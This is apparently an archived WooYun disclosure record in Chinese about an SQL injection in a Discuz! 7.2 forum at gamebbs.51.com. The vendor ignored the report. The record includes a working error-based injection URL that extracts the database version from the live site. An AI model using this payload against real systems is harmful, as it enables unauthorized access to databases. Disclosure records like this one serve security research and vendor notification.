51社区某论坛sql注入

编号70469
Urlhttp://www.wooyun.org/bug.php?action=view&id=70469
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题51社区某论坛sql注入
漏洞类型SQL注射漏洞
厂商51.com
白帽子浅兮
提交日期2014-07-31 15:28:00
公开日期2014-08-05 15:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank0
漏洞简介
51社区某论坛sql注入
漏洞细节

51社区某论坛sql注入。discuz!x7.2注入漏洞
http://gamebbs.51.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

1.jpg

POC

1.jpg

discuz!x7.2注入漏洞。

修复方案

状态信息 2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None
回应信息危害等级:无影响厂商忽略忽略时间:2014-08-05 15:30